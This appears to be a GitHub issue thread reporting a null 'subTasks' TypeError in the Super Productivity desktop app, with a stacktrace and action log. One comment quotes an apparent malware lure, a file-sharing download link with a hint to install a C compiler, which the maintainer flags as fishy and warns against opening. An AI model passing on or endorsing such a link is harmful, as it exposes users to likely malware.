### ISSUE TITLE
TypeError: Cannot read properties of null (reading 'subTasks')

### ISSUE THREAD

**Issue by benHaseep** [johannesjo/super-productivity#3496]
### Steps to Reproduce

1.
2.
3.
4.

### Meta Info
META: SP9.0.3 Electron – en-US – Linux x86_64 – Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) superProductivity/9.0.3 Chrome/122.0.6261.156 Electron/29.4.5 Safari/537.36

### Stacktrace
```
TypeError: Cannot read properties of null (reading 'subTasks')
    at file:///tmp/.mount_superPhOX3qS/resources/app.asar/dist/browser/main-JWCHIBT3.js:92:130836
    at Array.forEach (<anonymous>)
    at qO (file:///tmp/.mount_superPhOX3qS/resources/app.asar/dist/browser/main-JWCHIBT3.js:92:130812)
    at P4.project (file:///tmp/.mount_superPhOX3qS/resources/app.asar/dist/browser/main-JWCHIBT3.js:94:40102)
    at P4._next (file:///tmp/.mount_superPhOX3qS/resources/app.asar/dist/browser/main-JWCHIBT3.js:79:20305)
    at P4.next (file:///tmp/.mount_superPhOX3qS/resources/app.asar/dist/browser/main-JWCHIBT3.js:79:2372)
    at Jo.next (file:///tmp/.mount_superPhOX3qS/resources/app.asar/dist/browser/main-JWCHIBT3.js:79:7126)
    at Jo.nextInfiniteTimeWindow (file:///tmp/.mount_superPhOX3qS/resources/app.asar/dist/browser/main-JWCHIBT3.js:79:17420)
    at Object.next (file:///tmp/.mount_superPhOX3qS/resources/app.asar/dist/browser/main-JWCHIBT3.js:79:45429)
    at LA.__tryOrUnsub (file:///tmp/.mount_superPhOX3qS/resources/app.asar/dist/browser/main-JWCHIBT3.js:79:4161)
```

### Actions Before Error
```
1726717828092: [Persistence] Remove from DB 
1726717846338: [Task] SetSelectedTask 
1726717846351: [Layout] Hide Notes 
1726717848326: [Task] Update Task Tags 
1726717848338: [Persistence] Save to DB (2) 
1726717848339: [Task] Move to archive 
1726717848347: [Persistence] Save to DB 
1726717848348: [Task] UnsetCurrentTask 
1726717848354: [Pomodoro] Pause Pomodoro 
1726722527295: [Idle] Trigger Idle 
1726722528280: [Idle] Set idle time 
1726722528285: [Idle] Open dialog 
1726741959239: [Idle] Set idle time (19389) 
1726741960130: [Idle] Dialog result 
1726741960145: [Idle] Reset break timer 
1726741960151: [Tag] Update Break Time for Tag 
1726741960175: [Idle] Reset 
1726741960182: [Persistence] Save to DB 
1726741971658: [Task] Update Task Tags 
1726741971679: [Persistence] Save to DB (2) 
1726741973612: [Task] Update Task Tags 
1726741973617: [Persistence] Save to DB (2) 
1726742005620: [Task] Delete Task 
1726742026345: [FocusMode] Set focus session elapsed time 
1726742038705: [SP_ALL] Load(import) all data 
1726742038713: [SP_ALL] All Data was loaded 
1726742068481: [FocusMode] Set focus session elapsed time 
1726742068857: [SP_ALL] Load(import) all data 
1726742068866: [SP_ALL] All Data was loaded 
1726742075645: [Task] Delete Task
```

**Comment by benHaseep** [comment]
> download
> 
> https://mega.nz/file/1vkGlJTL#yU-SJLlIilF0mx5qwpPOd3BM8iKZqOJLEQUStR76rrQ
> 
> you may need to install the c compiler

What is this?!

**Comment by johannesjo** [comment]
The file you posted looks fishy. Don't open it. 

Where did you download the app? v9.0.3 is quite old also.
